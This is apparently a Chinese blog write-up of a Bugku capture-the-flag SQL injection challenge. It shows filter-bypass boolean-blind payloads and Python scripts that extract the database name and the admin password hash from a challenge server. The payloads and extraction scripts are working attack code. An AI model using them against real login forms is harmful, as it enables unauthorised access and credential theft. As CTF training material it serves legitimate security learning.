当前位置:网站首页>Bugku sql注入
Bugku sql注入
2022-07-30 23:17:00 【白塔河冲浪手】
进入环境是个登录页面
提示这题布尔盲注,先fuzz一波
过滤了length,like,information,and,union,select,order,where等等
用括号绕过空格,我们发现能用的字符有<>,or,'
先万能密码试试看,<>是不等于的意思
'or(1<>2)#
'or(1<>1)#
可以确定这里有布尔盲注
那么开始注入 参考博客
'or(length(database())>7)# 回显password error!
'or(length(database())>8)# 回显username does not exist!
说明数据库长度为7
后面爆数据库
利用reverse和from
a'or(ascii(substr(reverse(substr((database())from(1)))from(8)))<>98)#
最后利用脚本爆出数据库
import requests
url='http://114.67.175.224:19015/index.php'
database=''
for i in range(1,9):
for p in range(45,126):
m=9-i
sql="a'or(ord(substr(reverse(substr((database())from(%d)))from(%d)))<>%s)#"%(i,m,p)
data={
'username':sql,
'password':'1'
}
res=requests.post(url=url,data=data)
if "username does not exist!" in res.text:
database+=chr(p)
print (database)
break
print ("==========================")
print("\n"+database)
得到数据库后面因为fuzz后发现过滤了太多字符,所以这里根据参考博客是用字典跑出数据表和字段,这里先跳过
得到数据表admin和字段名password后
爆破密码
password=''
for i in range(1,33):
for p in range(45,126):
m=33-i
sql="a'or(ord(substr(reverse(substr((select(group_concat(password))from(blindsql.admin))from(%d)))from(%d)))<>%s)#"%(i,m,p)
data={
'username':sql,
'password':'1'
}
res=requests.post(url=url,data=data)
if "username does not exist!" in res.text:
password+=chr(p)
print (password)
break
print ("==========================")
print("\n"+password)
解md5 4dcc88f8f1bc05e7c2ad1a60288481a2
得到密码bugctf
去登录 账号是admin
边栏推荐
猜你喜欢
随机推荐
uniapp开发微信小程序-软考刷题小程序
Go1.18升级功能 - 泛型 从零开始Go语言
Day016 类和对象
MySql统计函数COUNT详解
JS中? ?和??=和?.和 ||的区别
【Untitled】
Apache Doris series: detailed steps for installation and deployment
DFS question list and template summary
# Dasctf 7月赋能赛 WP
leetcode:127. 单词接龙
Soft Exam Summary
2021GDCPC广东省大学生程序设计竞赛 H.History
grub 学习
Flex布局使用
2sk2225 Substitute 3A/1500V Chinese Documentation【PDF Data Book】
科技的成就(三十一)
编码与进制
“蔚来杯“2022牛客暑期多校训练营4 N.Particle Arts 规律 方差
A detailed explanation: SRv6 Policy model, calculation and drainage
"NIO Cup" 2022 Nioke Summer Multi-School Training Camp 2 H.Take the Elevator